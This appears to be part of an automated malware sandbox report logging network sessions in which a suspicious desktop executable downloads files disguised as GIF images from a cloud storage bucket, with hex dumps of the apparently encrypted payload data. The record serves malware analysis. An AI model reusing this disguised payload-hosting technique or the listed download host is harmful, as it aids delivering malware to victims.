                                                    2025-01-06 03:43:30 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                                    2025-01-06 03:43:30 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                                    Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                                    2025-01-06 03:43:30 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                                    Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.94997639.103.20.264437580C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:43:31 UTC111OUTGET /b.gif HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:32 UTC547INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:32 GMT
                                                    Content-Type: image/gif
                                                    Content-Length: 125333
                                                    Connection: close
                                                    x-oss-request-id: 677B5163AF1C2D393240C55A
                                                    Accept-Ranges: bytes
                                                    ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                    Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 10333201072197591521
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000104
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                    x-oss-server-time: 27
                                                    2025-01-06 03:43:32 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                    2025-01-06 03:43:32 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                                    Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                    2025-01-06 03:43:32 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                                    Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                    2025-01-06 03:43:32 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                                    Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                    2025-01-06 03:43:32 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                                    Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                    2025-01-06 03:43:32 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                                    Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                    2025-01-06 03:43:32 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                                    Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                    2025-01-06 03:43:32 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                                    Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                    2025-01-06 03:43:32 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                                    Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                    2025-01-06 03:43:32 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                                    Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.94997739.103.20.264437580C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:43:33 UTC111OUTGET /c.gif HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:33 UTC546INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:33 GMT
                                                    Content-Type: image/gif
                                                    Content-Length: 10681
                                                    Connection: close
                                                    x-oss-request-id: 677B516572AE9E34334B9362
                                                    Accept-Ranges: bytes
                                                    ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                    Last-Modified: Sun, 05 Jan 2025 09:00:14 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 10287299869673359293
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000104
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                    x-oss-server-time: 25
                                                    2025-01-06 03:43:33 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                    2025-01-06 03:43:33 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                                    Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                                    2025-01-06 03:43:33 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                                    Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.94997839.103.20.264437580C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:43:35 UTC111OUTGET /d.gif HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:43:35 UTC547INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:43:35 GMT
                                                    Content-Type: image/gif
                                                    Content-Length: 3892010
                                                    Connection: close
                                                    x-oss-request-id: 677B5167F326DB3339A09661
                                                    Accept-Ranges: bytes
                                                    ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                    Last-Modified: Sun, 05 Jan 2025 09:00:25 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 3363616613234190325
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000104
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                    x-oss-server-time: 15
                                                    2025-01-06 03:43:35 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
